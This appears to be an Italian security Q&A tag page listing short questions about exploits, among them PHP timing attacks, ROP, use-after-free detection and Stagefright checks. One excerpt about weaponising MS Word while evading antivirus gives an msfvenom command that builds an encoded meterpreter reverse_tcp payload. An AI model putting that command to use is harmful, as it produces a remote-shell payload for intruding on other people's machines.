Domande con tag 'exploit'

1
risposta

Attacchi a tempo: contro PHP Server - Prevenzione / Tutorial [duplicato]

Qual è il modo più semplice ed efficace per prevenire gli attacchi di temporizzazione per i programmatori che usano PHP? Sono uno studente delle superiori, sono nuovo alla programmazione e ho imparato la sicurezza da poche settimane. Conosc...
posta 18.10.2018 - 09:54
1
risposta

Un proxy inverso può proteggere dall'exploit del server web? [chiuso]

Sto cercando una soluzione di sicurezza per il mio server web Apache in ambiente Windows per servizi autenticati pubblicati su Internet, non riesco a configurare una DMZ perché è pesantemente connessa a tutti gli altri server di quella rete....
posta 30.08.2017 - 08:30
1
risposta

Trasferimento di allegati e-mail potenzialmente dannosi alla macchina con aria compressa

Panoramica : mi interessa avere un account e-mail designato per ricevere suggerimenti anonimi come parte di un'infrastruttura di suggerimenti anonimi più ampia presso la mia attività. La posta elettronica del mio dominio professionale è fornita...
posta 20.02.2018 - 04:13
1
risposta

Come fa il dispositivo ERAD ad accedere al tuo conto bancario personale?

Sto cercando di ottenere dettagli su come esattamente questo dispositivo ERAD è in grado di accedere e prelevare da conti bancari personali. link Sono abbastanza sicuro che il dispositivo fa una query diretta a FINCEN ed è una nuova tecn...
posta 09.06.2016 - 16:34
1
risposta

Utilizzo di office_word_hta

Sto cercando di sfruttare MS Word, evitando il rilevamento AV. Quindi, cosa devo fare? In primo luogo, generando il payload, ad esempio: msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 3 -o ~/payload.exe...
posta 14.09.2017 - 10:24
1
risposta

Kit di malware o exploit senza kit di escalation

Qualcuno sa di malware o kit di exploit che non usa un kit di escalation di privilegi e fa semplicemente cose malvagie con un permesso non privilegiato?     
posta 19.11.2014 - 20:05
1
risposta

ROP: utilizza il valore di ritorno della funzione

È possibile chiamare una funzione e memorizzare il suo valore di ritorno nello stack successivo? call foo(); // int foo(); store return value of foo in next stack frame; call bar(int);     
posta 22.11.2015 - 22:26
2
risposte

Microsoft EMET protegge dall'ultimo exploit Adobe Flash 0-day dell'Hacking Team?

Se non dovessi aggiornare Adobe Flash e invece usassi la vecchia versione (da prima che l'exploit 0-day di Hacking Team fosse pubblicato su Internet), in tal caso, Microsoft EMET mi proteggerà dall'ultimo Hacking Team Adobe Flash Exploit 0 giorn...
posta 08.08.2015 - 07:39
2
risposte

Come trovare le vulnerabilità Use-After-Free? [chiuso]

Ho seguito un sacco di tutorial sullo sfruttamento delle vulnerabilità UAF, ma non è mai stato spiegato come trovare e rilevare le vulnerabilità UAF in JavaScript o HTML (cioè con un'analisi statica). La mia domanda è: come decodificare le fu...
posta 26.03.2016 - 08:33
1
risposta

Come verificare se il tuo telefono è stato compromesso [chiuso]

Poiché l'exploit Stagefright è molto comune su molti dispositivi, volevo chiedere se esiste un modo per verificare se qualcuno ha utilizzato questo exploit su un determinato dispositivo. Come controllare i processi per le voci sconosciute, contr...
posta 19.08.2015 - 12:05